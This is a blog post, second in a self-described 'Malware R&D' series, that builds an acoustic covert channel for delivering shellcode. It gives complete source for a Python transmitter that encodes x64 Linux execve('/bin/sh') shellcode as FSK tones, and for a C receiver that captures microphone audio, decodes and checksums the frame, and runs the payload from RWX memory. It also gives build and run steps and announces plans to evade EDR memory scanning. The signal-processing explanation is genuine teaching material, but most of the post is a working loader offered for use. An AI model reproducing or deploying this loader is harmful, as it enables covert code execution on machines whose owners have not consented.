Hello, cybersecurity enthusiasts and white hackers!

This is the second post in our series on Signal Processing and Math for Malware R&D. In part 1, we proved that we could turn bytes into sound. However, if you tried to run that code in a noisy room, you likely noticed it rarely worked.

Today, we tackle the two biggest problems of acoustic data transfer: framing and synchronization. We will turn our “beeping” script into a usable communication protocol.

the problem

In our initial research, we sent raw bits. This approach fails in real-world scenarios for two technical reasons.

First, the receiver doesn’t know exactly when the first bit begins. At 300 baud a bit lasts about 3.3 milliseconds, so if recording starts even 5 milliseconds late, the receiver misses the first bit entirely.

The second problem is bit straddling. If the receiver’s 160-sample window starts in the middle of a bit, the Goertzel filter sees half of a 1 and half of a 0. The two tone powers come out close to each other, so the decision is ambiguous, leading to a “bit-flip” and corrupted shellcode.
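To make the straddling problem concrete, here is a minimal sketch in pure Python. It assumes the tone parameters used later in this post (48 kHz, 160 samples per bit, 2200/1200 Hz), and `tone_power` is a hypothetical helper that measures tone power with a direct DFT sum instead of Goertzel. It compares a window that sits exactly on a bit with one that starts half a bit late:

```python
import cmath
import math

SAMPLE_RATE = 48000
SPB = 160                       # samples per bit at 300 baud
FREQ_MARK, FREQ_SPACE = 2200, 1200

def tone(bit):
    """One bit period of the mark or space tone, starting at phase 0."""
    freq = FREQ_MARK if bit else FREQ_SPACE
    return [math.sin(2 * math.pi * freq * n / SAMPLE_RATE) for n in range(SPB)]

def tone_power(window, freq):
    """Squared magnitude of the window's spectrum at freq (direct DFT sum)."""
    w = 2 * math.pi * freq / SAMPLE_RATE
    acc = sum(x * cmath.exp(-1j * w * n) for n, x in enumerate(window))
    return abs(acc) ** 2

signal = tone(1) + tone(0)                      # a 1 followed by a 0
aligned = signal[0:SPB]                         # exactly the first bit
straddled = signal[SPB // 2:SPB // 2 + SPB]     # half of the 1, half of the 0

for name, win in (("aligned", aligned), ("straddled", straddled)):
    pm, ps = tone_power(win, FREQ_MARK), tone_power(win, FREQ_SPACE)
    print(f"{name:9s} mark/space power ratio = {pm / ps:.2f}")
```

For the aligned window the mark power dominates by a wide margin. For the straddled window the two powers are of the same order, so a little noise is enough to tip the decision either way.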

To fix this, we need to wrap our shellcode in a frame.

defining the protocol frame

In simple terms, a frame is a structured packet that tells the receiver something like: “get ready, here is how much data is coming, and here is a way to check if it arrived safely.”

Our frame structure:

[ preamble: 5 bytes ] [ length: 2 bytes, big-endian ] [ payload: N bytes ] [ checksum: 1 byte ]

What is the preamble here? We use 0xAA 0xAA 0xAA 0xAA 0x7E. The alternating bits (1010...) help the receiver find the “pulse” of the transmission, and the trailing 0x7E breaks the pattern so the receiver can tell where the preamble ends.

The length field is two bytes: a big-endian integer holding the shellcode size. By reading the length field right after the preamble, the receiver knows exactly how many 160-sample windows to process sequentially, so it stays on the bit grid for the rest of the frame instead of slipping into mid-bit boundaries.

Finally, the checksum is the XOR of all payload bytes and is used to check integrity. Note that it covers the payload only, not the length field. So, in our code, we need the following logic: if a residual bit flip still occurs due to background acoustic noise, the checksum validation fails and the packet is dropped instead of passing corrupted payload bytes to the execution engine.

In Python, building this frame looks like this:

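import struct

PREAMBLE = bytes([0xAA, 0xAA, 0xAA, 0xAA, 0x7E])

def build_frame(payload):
    # calculate XOR checksum over the payload bytes
    cksum = 0
    for b in payload:
        cksum ^= b
    # preamble + 2-byte big-endian length + payload + 1-byte checksum
    return PREAMBLE + struct.pack('>H', len(payload)) + payload + bytes([cksum])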
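To sanity-check the layout before any audio is involved, a round trip at the byte level is useful. The sketch below repeats `build_frame` so that it runs on its own; `parse_frame` is a hypothetical helper (it is not part of the transmitter or the receiver) and the payload is a harmless test string:

```python
import struct

PREAMBLE = bytes([0xAA, 0xAA, 0xAA, 0xAA, 0x7E])

def build_frame(payload):
    cksum = 0
    for b in payload:
        cksum ^= b
    return PREAMBLE + struct.pack('>H', len(payload)) + payload + bytes([cksum])

def parse_frame(frame):
    """Hypothetical inverse of build_frame: return the payload, or None."""
    header = len(PREAMBLE) + 2
    if len(frame) < header + 1 or not frame.startswith(PREAMBLE):
        return None
    (length,) = struct.unpack('>H', frame[len(PREAMBLE):header])
    if len(frame) < header + length + 1:
        return None                      # truncated frame
    payload = frame[header:header + length]
    cksum = 0
    for b in payload:
        cksum ^= b
    return payload if cksum == frame[header + length] else None

frame = build_frame(b"hello")
print(frame.hex(" "))                    # preamble, length, payload, checksum
print(parse_frame(frame))                # the original payload

damaged = bytearray(frame)
damaged[8] ^= 0x01                       # flip one bit inside the payload
print(parse_frame(bytes(damaged)))       # None: checksum mismatch
```

The same three checks (preamble, length bound, checksum) are what the C receiver has to perform, only on a bit array instead of a byte string.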

brute-force strategy in receiver

The biggest challenge in the C receiver is sample alignment. Since we don’t know where the bit grid starts, we use a “brute-force” strategy. We record a 6-second chunk of audio. Then, we try to demodulate it 16 different times, shifting the starting point by 10 samples each time (since one bit is 160 samples, 160/16 = 10). At least one of these 16 attempts lands within 5 samples of the transmitter’s grid, which in practice is close enough for a clean decision on every bit.

The logic in C looks like this:

for (int t = 0; t < 16; t++) {
  int offset = t * 10; // try every 10th sample
  if (try_offset(audio_buffer, total_samples, offset)) {
    // success! frame found and executed.
    break; 
  }
}
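The same search can be simulated without a microphone. The following is a minimal sketch under stated assumptions: a noise-free signal, a made-up delay of 37 samples, and hypothetical helpers (`tone`, `power`, `demodulate`, `contains`) that mirror the post's parameters but are not taken from the receiver:

```python
import math

SAMPLE_RATE, SPB = 48000, 160
FREQ_MARK, FREQ_SPACE = 2200, 1200

def tone(bit):
    freq = FREQ_MARK if bit else FREQ_SPACE
    return [math.sin(2 * math.pi * freq * n / SAMPLE_RATE) for n in range(SPB)]

def power(window, freq):
    """Tone power via correlation with a cosine and a sine."""
    w = 2 * math.pi * freq / SAMPLE_RATE
    re = sum(x * math.cos(w * n) for n, x in enumerate(window))
    im = sum(x * math.sin(w * n) for n, x in enumerate(window))
    return re * re + im * im

def demodulate(signal, offset):
    """Slice the signal into SPB-sized windows from offset and decide each bit."""
    n_bits = (len(signal) - offset) // SPB
    out = []
    for i in range(n_bits):
        win = signal[offset + i * SPB: offset + (i + 1) * SPB]
        out.append(1 if power(win, FREQ_MARK) > power(win, FREQ_SPACE) else 0)
    return out

def contains(haystack, needle):
    return any(haystack[i:i + len(needle)] == needle
               for i in range(len(haystack) - len(needle) + 1))

sent = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0]  # 0xAA, 0x7E LSB-first
DELAY = 37   # assumed "late start" in samples, unknown to the receiver
signal = [0.0] * DELAY + [s for b in sent for s in tone(b)] + [0.0] * SPB

good_offsets = [off for off in range(0, SPB, 10)
                if contains(demodulate(signal, off), sent)]
print("offsets that recover the bit pattern:", good_offsets)
```

In this clean simulation several offsets around the true delay recover the pattern, not just one. With real room noise the usable range shrinks, which is why a fine 10-sample step is worth the extra work.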

demodulation via Goertzel

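For every 160-sample window, we apply the Goertzel algorithm. It acts as a high-speed “tuning fork” for our two frequencies: 2200 Hz (Mark, bit 1) and 1200 Hz (Space, bit 0). Note that this assignment is the reverse of the Bell 202 convention, where mark is 1200 Hz and space is 2200 Hz. It works here because the transmitter and the receiver agree on it.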

The math for our filter coefficient \( w \) is: \(\omega = \frac{2\pi \cdot f_{target}}{f_{sampling}}, \quad w = 2 \cos(\omega)\)

The receiver implements the filter as shown here. For each trial offset, it is applied to every window to convert the audio into a flat array of bits (0 or 1), and that array is then scanned for our 0xAA... preamble:

double goertzel(const int16_t *s, int n, double freq) {
  double omega = 2.0 * M_PI * freq / SAMPLE_RATE;
  double coeff = 2.0 * cos(omega);
  double q1 = 0, q2 = 0, q0;
  for (int i = 0; i < n; i++) {
    q0 = coeff * q1 - q2 + (double)s[i] / 32768.0;
    q2 = q1; q1 = q0;
  }
  return q1 * q1 + q2 * q2 - coeff * q1 * q2;
}
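A quick way to convince yourself that the recurrence does what the formula says is to compare it with a direct DFT sum at the same frequency. This is a sketch, not the receiver's code: the Python `goertzel` below is a port of the C function without the 1/32768 normalization, and `dft_power` is a hypothetical reference helper:

```python
import cmath
import math

SAMPLE_RATE = 48000

def goertzel(samples, freq):
    """Python port of the recurrence used in the C receiver."""
    coeff = 2.0 * math.cos(2.0 * math.pi * freq / SAMPLE_RATE)
    q1 = q2 = 0.0
    for x in samples:
        q0 = coeff * q1 - q2 + x
        q2, q1 = q1, q0
    return q1 * q1 + q2 * q2 - coeff * q1 * q2

def dft_power(samples, freq):
    """Reference value: squared magnitude of the DFT sum at freq."""
    w = 2.0 * math.pi * freq / SAMPLE_RATE
    acc = sum(x * cmath.exp(-1j * w * n) for n, x in enumerate(samples))
    return abs(acc) ** 2

# one bit period of the 2200 Hz tone
window = [math.sin(2 * math.pi * 2200 * n / SAMPLE_RATE) for n in range(160)]
for f in (2200, 1200):
    print(f, round(goertzel(window, f), 3), round(dft_power(window, f), 3))
```

Both columns agree up to floating-point error. The practical difference is that Goertzel needs one multiplication by a constant per sample and no complex exponentials, which is why it suits a receiver that only cares about two frequencies.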

practical example

Let me try to explain the logic behind try_offset. Because the receiver starts recording at an arbitrary time, the “bit grid” is unknown. This function is designed to test a specific sample offset to see if it perfectly aligns with the transmitted tones.

Our function starts by slicing the raw audio buffer into bit-sized chunks (160 samples each), starting exactly at the provided offset:

int n_bits = (n_samples - offset) / SPB;
uint8_t *bits = malloc(n_bits);
for (int i = 0; i < n_bits; i++) {
  double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
  double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
  bits[i] = (pm > ps) ? 1 : 0;
}

Here we convert the “analog” audio samples into a digital array of 1s and 0s. If \( pm > ps \), we record a 1; otherwise, a 0. By trying different offsets in the main loop, we eventually find one where the windows don’t “straddle” two different bits, resulting in a clean digital signal.

Next, we need preamble-hunting logic. Once we have a bit array, we need to find where the actual data starts. We scan the array for our 40-bit preamble (0xAA 0xAA 0xAA 0xAA 0x7E):

for (int i = 0; i < n_bits - 80; i++) {
  int match = 1;
  for (int b = 0; b < 5; b++) 
    if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
  if (!match) continue;
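The scan is easier to follow on a small synthetic bit array. The sketch below is a Python model of the same idea, assuming the LSB-first bit order that the transmitter's `byte_to_signal` uses; `find_preamble` and `byte_to_bits` are hypothetical helper names:

```python
PREAMBLE = bytes([0xAA, 0xAA, 0xAA, 0xAA, 0x7E])

def get_byte(bits, pos):
    """Pack 8 bits starting at pos into a byte, least significant bit first."""
    return sum(bits[pos + i] << i for i in range(8))

def byte_to_bits(byte):
    """Expand a byte into 8 bits, least significant bit first."""
    return [(byte >> i) & 1 for i in range(8)]

def find_preamble(bits):
    """Return the bit index where the preamble starts, or -1 if absent."""
    for i in range(len(bits) - 8 * len(PREAMBLE) + 1):
        if all(get_byte(bits, i + 8 * b) == PREAMBLE[b]
               for b in range(len(PREAMBLE))):
            return i
    return -1

# 13 bits of silence, then the preamble, then 24 more bits of silence
stream = [0] * 13 + [bit for byte in PREAMBLE for bit in byte_to_bits(byte)] + [0] * 24
print(find_preamble(stream))   # prints 13
```

Note that the search moves one bit at a time, not one byte at a time: the frame can begin at any bit index in the demodulated array.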

Next, we extract the metadata (length). Immediately following the preamble are 16 bits (2 bytes) that define the shellcode size:

int cursor = i + 40; // skip preamble (40 bits)
uint16_t len = (get_byte(bits, cursor) << 8) | get_byte(bits, cursor + 8);
cursor += 16; // move past length field
if (cursor + ((int)len + 1) * 8 > n_bits) continue; // frame would run past the captured bits

The loader now knows exactly how many bytes to extract from the bit stream. It assembles the 16-bit integer from two 8-bit values, high byte first.

Then, the loader extracts the payload byte-by-byte while simultaneously calculating an XOR checksum:

uint8_t *payload = malloc(len);
uint8_t calc_cksum = 0;
for (int p = 0; p < len; p++) {
  payload[p] = get_byte(bits, cursor);
  calc_cksum ^= payload[p];
  cursor += 8;
}

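What is the error-detection logic here? As each byte is recovered, it is XORed into calc_cksum. Any single flipped bit caused by “acoustic interference” (like a door slamming or a cough) changes the result and is detected. An even number of flips in the same bit position cancels out and goes unnoticed, so this is a lightweight check rather than a strong one.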
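What an XOR checksum can and cannot catch is easy to show on a few bytes. This is a small illustration with made-up data; `xor_checksum` is the same loop as in `build_frame`, pulled out into a helper:

```python
def xor_checksum(data):
    """XOR of all bytes, as used for the frame checksum."""
    cksum = 0
    for b in data:
        cksum ^= b
    return cksum

original = bytes([0x10, 0x20, 0x30, 0x40])
one_flip = bytes([0x11, 0x20, 0x30, 0x40])    # bit 0 flipped in byte 0
two_flips = bytes([0x11, 0x21, 0x30, 0x40])   # bit 0 flipped in bytes 0 and 1

print(xor_checksum(original) == xor_checksum(one_flip))    # False: detected
print(xor_checksum(original) == xor_checksum(two_flips))   # True: missed
```

A CRC would catch the second case as well, at the cost of a slightly longer trailer. For this series the one-byte XOR keeps the frame format simple.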

At the last step, we need final verification and execution. If the checksum matches the final byte in the frame, we move from data processing to code execution:

if (calc_cksum == get_byte(bits, cursor)) {
  printf("[=^..^=] offset %d: checksum OK. executing %d bytes...\n", offset, len);
  void *mem = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
  memcpy(mem, payload, len);
  ((void(*)())mem)();
  return 1;
}

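If calc_cksum matches the received byte, the payload is very likely intact. A one-byte XOR cannot prove it, though: a random bit pattern still passes the check with probability 1/256.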

The full source code of this function:

int try_offset(const int16_t *audio, int n_samples, int offset) {
  int n_bits = (n_samples - offset) / SPB;
  uint8_t *bits = malloc(n_bits);
  for (int i = 0; i < n_bits; i++) {
    double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
    double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
    bits[i] = (pm > ps) ? 1 : 0;
  }

  for (int i = 0; i < n_bits - 80; i++) {
    int match = 1;
    for (int b = 0; b < 5; b++) if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
    if (!match) continue;

    int cursor = i + 40;
    uint16_t len = (get_byte(bits, cursor) << 8) | get_byte(bits, cursor + 8);
    cursor += 16;
    if (cursor + ((int)len + 1) * 8 > n_bits) continue; // frame would run past the captured bits

    uint8_t *payload = malloc(len);
    uint8_t calc_cksum = 0;
    for (int p = 0; p < len; p++) {
      payload[p] = get_byte(bits, cursor);
      calc_cksum ^= payload[p];
      cursor += 8;
    }

    if (calc_cksum == get_byte(bits, cursor)) {
      printf("[=^..^=] offset %d: checksum OK. executing %d bytes...\n", offset, len);
      void *mem = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
      memcpy(mem, payload, len);
      ((void(*)())mem)();
      return 1;
    }
    free(payload);
  }
  free(bits);
  return 0;
}

The try_offset function is the core engine of our acoustic ear. It combines frequency detection with a brute-force alignment strategy. By iterating through sample offsets and verifying the result with an XOR checksum, the loader only executes a payload that passed the integrity check, which turns a noisy room into a workable delivery vector.

Otherwise, the logic is the same as in the first part. We use alsa/asoundlib.h and configure the hardware to match our transmitter: 48,000 Hz sampling rate, mono, and 16-bit signed format:

snd_pcm_t *handle;
snd_pcm_open(&handle, "default", SND_PCM_STREAM_CAPTURE, 0);
snd_pcm_set_params(handle, SND_PCM_FORMAT_S16_LE, SND_PCM_ACCESS_RW_INTERLEAVED, 1, 48000, 1, 500000);

The full source code of the transmitter looks like this. It includes the protocol framing and the live visualization for our research presentation:

#!/usr/bin/env python3
"""
transmit_live.py
acoustic shellcode transmitter - part 2: framing & sync
author: @cocomelonc
"""
import time
import struct
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt

# -- protocol constants (must match receiver.c) --
SAMPLE_RATE  = 48000
BAUD_RATE    = 300
FREQ_MARK    = 2200          # bit 1
FREQ_SPACE   = 1200          # bit 0
SPB          = SAMPLE_RATE // BAUD_RATE # 160 samples per bit
PREAMBLE     = bytes([0xAA, 0xAA, 0xAA, 0xAA, 0x7E])

# -- visualization constants --
WINDOW_BITS  = 24
WINDOW_SAMPS = SPB * WINDOW_BITS
TARGET_FPS   = 30

# -- x64 Linux execve("/bin/sh") --
SHELLCODE = bytes([
    0x48, 0x31, 0xc0, 0x50, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 
    0x2f, 0x2f, 0x73, 0x68, 0x53, 0x48, 0x89, 0xe7, 0x50, 0x57, 
    0x48, 0x89, 0xe6, 0x48, 0x31, 0xd2, 0xb0, 0x3b, 0x0f, 0x05
])

def build_frame(payload):
    cksum = 0
    for b in payload: cksum ^= b
    return PREAMBLE + struct.pack('>H', len(payload)) + payload + bytes([cksum])

def generate_tone(bit):
    freq = FREQ_MARK if bit else FREQ_SPACE
    t = np.arange(SPB) / SAMPLE_RATE
    return np.sin(2 * np.pi * freq * t).astype(np.float32)

def byte_to_signal(byte):
    return np.concatenate([generate_tone((byte >> i) & 1) for i in range(8)])

def build_figure():
    plt.style.use('dark_background')
    fig, (ax_wave, ax_spec) = plt.subplots(2, 1, figsize=(12, 6))
    fig.suptitle('[=^..^=] live acoustic transmission', color='#00ff88')
    line_wave, = ax_wave.plot(np.arange(WINDOW_SAMPS), np.zeros(WINDOW_SAMPS), color='#ffffff', lw=0.8)
    ax_wave.set_ylim(-1.3, 1.3)
    ax_wave.set_axis_off()
    freqs = np.fft.rfftfreq(WINDOW_SAMPS, d=1.0/SAMPLE_RATE)
    line_spec, = ax_spec.plot(freqs, np.zeros(len(freqs)), color='#ffaa00', lw=1.0)
    ax_spec.set_xlim(0, 4000)
    ax_spec.set_ylim(0, 1.1)
    return fig, line_wave, line_spec

def transmit_live(payload):
    frame = build_frame(payload)
    body = np.concatenate([byte_to_signal(b) for b in frame])
    lead = np.zeros(int(SAMPLE_RATE * 0.5), dtype=np.float32)
    signal = np.concatenate([lead, body, lead])
    total_samples = len(signal)

    fig, line_wave, line_spec = build_figure()
    plt.ion()
    plt.show()

    print(f"[=^..^=] shellcode: {len(payload)} bytes | frame: {len(frame)} bytes")
    sd.play(signal, SAMPLE_RATE)
    t_start = time.perf_counter()

    while True:
        elapsed = time.perf_counter() - t_start
        curr = int(elapsed * SAMPLE_RATE)
        if curr >= total_samples: break
        start = max(0, curr - WINDOW_SAMPS // 2)
        window = signal[start:start + WINDOW_SAMPS]
        if len(window) < WINDOW_SAMPS: window = np.pad(window, (0, WINDOW_SAMPS - len(window)))
        line_wave.set_ydata(window)
        mag = np.abs(np.fft.rfft(window))
        if mag.max() > 0: mag /= mag.max()
        line_spec.set_ydata(mag)
        fig.canvas.draw_idle()
        plt.pause(1.0/TARGET_FPS)

    sd.wait()
    print("[=^..^=] transmission finished.")

if __name__ == "__main__":
    transmit_live(SHELLCODE)

And for the receiver, the full source code in C looks like this (receiver.c):

/*
 * receiver.c
 * batch FSK receiver with brute-force alignment scanning.
 * author: @cocomelonc
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <math.h>
#include <sys/mman.h>
#include <alsa/asoundlib.h>

// Bell 202 and DSP Constants
#define PI          3.14159265358979323846
#define SAMPLE_RATE 48000
#define BAUD_RATE   300
#define FREQ_MARK   2200            // frequency for Bit 1
#define FREQ_SPACE  1200            // frequency for Bit 0
#define SPB         (SAMPLE_RATE / BAUD_RATE)   // samples per Bit (160)

// brute-force alignment parameters
#define CAPTURE_SECS 6              // capture duration
#define N_OFFSETS    16             // number of trial offsets per bit period
#define OFFSET_STEP  (SPB / N_OFFSETS) // 10 samples shift per trial

// frame preamble for synchronization
static const uint8_t PREAMBLE[] = {0xAA, 0xAA, 0xAA, 0xAA, 0x7E};

// Goertzel algorithm: detects the magnitude of a specific frequency in a block of samples
static double goertzel(const int16_t *s, int n, double freq) {
  double omega = 2.0 * PI * freq / (double)SAMPLE_RATE;
  double coeff = 2.0 * cos(omega);
  double q1 = 0.0, q2 = 0.0, q0;
  for (int i = 0; i < n; i++) {
    // normalize 16-bit PCM to float and apply recursive filter
    q0 = coeff * q1 - q2 + (double)s[i] / 32768.0;
    q2 = q1;
    q1 = q0;
  }
  return q1 * q1 + q2 * q2 - coeff * q1 * q2;
}

// reconstructs a byte from a bit stream (LSB-first)
uint8_t get_byte(const uint8_t *bits, int offset) {
  uint8_t res = 0;
  for (int i = 0; i < 8; i++) if (bits[offset + i]) res |= (uint8_t)(1u << i);
  return res;
}

// tries to decode the captured audio buffer starting at a specific sample offset
int try_offset(const int16_t *audio, int n_samples, int offset) {
  int n_bits = (n_samples - offset) / SPB;
  uint8_t *bits = malloc(n_bits);

  // demodulate audio samples into a digital bit array
  for (int i = 0; i < n_bits; i++) {
    double pm = goertzel(audio + offset + i * SPB, SPB, FREQ_MARK);
    double ps = goertzel(audio + offset + i * SPB, SPB, FREQ_SPACE);
    bits[i] = (pm > ps) ? 1 : 0;
  }

  // scan bit array for the 40-bit preamble
  for (int i = 0; i < n_bits - 80; i++) {
    int match = 1;
    for (int b = 0; b < 5; b++) if (get_byte(bits, i + b * 8) != PREAMBLE[b]) match = 0;
    if (!match) continue;

    // preamble found: Extract 16-bit payload length
    int cursor = i + 40;
    uint16_t len = (get_byte(bits, cursor) << 8) | get_byte(bits, cursor + 8);
    cursor += 16;
    if (cursor + ((int)len + 1) * 8 > n_bits) continue; // frame would run past the captured bits

    uint8_t *payload = malloc(len);
    uint8_t calc_cksum = 0;

    // extract payload and calculate XOR checksum
    for (int p = 0; p < len; p++) {
      payload[p] = get_byte(bits, cursor);
      calc_cksum ^= payload[p];
      cursor += 8;
    }

    // verify integrity against the checksum byte
    if (calc_cksum == get_byte(bits, cursor)) {
      printf("[=^..^=] offset %d: checksum OK. executing %d bytes...\n", offset, len);
      
      // allocate RWX memory and execute shellcode
      void *mem = mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0);
      memcpy(mem, payload, len);
      ((void(*)())mem)();
      return 1;
    }
    free(payload);
  }
  free(bits);
  return 0;
}

int main() {
  snd_pcm_t *h;
  // setup ALSA capture device (microphone)
  snd_pcm_open(&h, "default", SND_PCM_STREAM_CAPTURE, 0);
  snd_pcm_set_params(h, SND_PCM_FORMAT_S16_LE, SND_PCM_ACCESS_RW_INTERLEAVED, 1, SAMPLE_RATE, 1, 100000);

  // capture raw audio into memory buffer
  int total = CAPTURE_SECS * SAMPLE_RATE;
  int16_t *buf = malloc(total * sizeof(int16_t));
  printf("[=^..^=] listening for 6 seconds...\n");
  snd_pcm_readi(h, buf, total);
  snd_pcm_close(h);

  // brute-force: try every possible sample alignment offset
  for (int t = 0; t < N_OFFSETS; t++) {
    if (try_offset(buf, total, t * OFFSET_STEP)) {
      free(buf); return 0;
    }
  }

  printf("[=^..^=] no valid payload found.\n");
  free(buf); return 1;
}

demo

Let’s see this in action.

First of all, compile our receiver:

gcc receiver.c -o receiver -lasound -lm

Then, run it:

./receiver

Within the 6-second window, run the transmitter:

python3 transmit_live.py

As we can see, the checksum is OK and the shellcode spawned successfully. In my case, I had to run the transmitter three times.
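Part of the reason for the retries is simple timing: the whole frame has to fit inside the capture window. Here is a rough back-of-the-envelope sketch using the constants from the two programs. `frame_airtime` and `latest_start` are hypothetical helpers, and the estimate ignores interpreter startup, plot setup and audio driver latency, all of which reduce the margin further:

```python
BAUD_RATE = 300
CAPTURE_SECS = 6             # receiver capture duration
LEAD_SECS = 0.5              # silence the transmitter plays before the frame
OVERHEAD_BYTES = 5 + 2 + 1   # preamble + length + checksum

def frame_airtime(payload_len):
    """Seconds of tone needed for one frame at BAUD_RATE bits per second."""
    return (OVERHEAD_BYTES + payload_len) * 8 / BAUD_RATE

def latest_start(payload_len):
    """Latest playback start, in seconds after capture begins, that still fits."""
    return CAPTURE_SECS - LEAD_SECS - frame_airtime(payload_len)

print(f"airtime for a 30-byte payload: {frame_airtime(30):.3f} s")
print(f"latest playback start:         {latest_start(30):.3f} s")
```

For the 30-byte payload used here the frame itself takes about one second on air, so playback has to begin roughly within the first four and a half seconds of the capture.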

conclusion

We have built a reliable physical-layer link. However, there is a remaining problem: if an EDR scans the memory of our receiver while it is recording, it might see the shellcode bytes in the bits or payload arrays.

In the next parts, we will introduce the Discrete Fourier Transform (DFT) again. We will stop sending raw bits and start sending frequency coefficients, ensuring the shellcode only exists as “mathematical noise” until the moment of execution.

FSK
Bell 202 standard
Discrete Fourier Transform (DFT)
Goertzel Algorithm
source code in github

This is a practical case for educational purposes only.

Thanks for your time, happy hacking, and goodbye! PS. All drawings and screenshots are mine.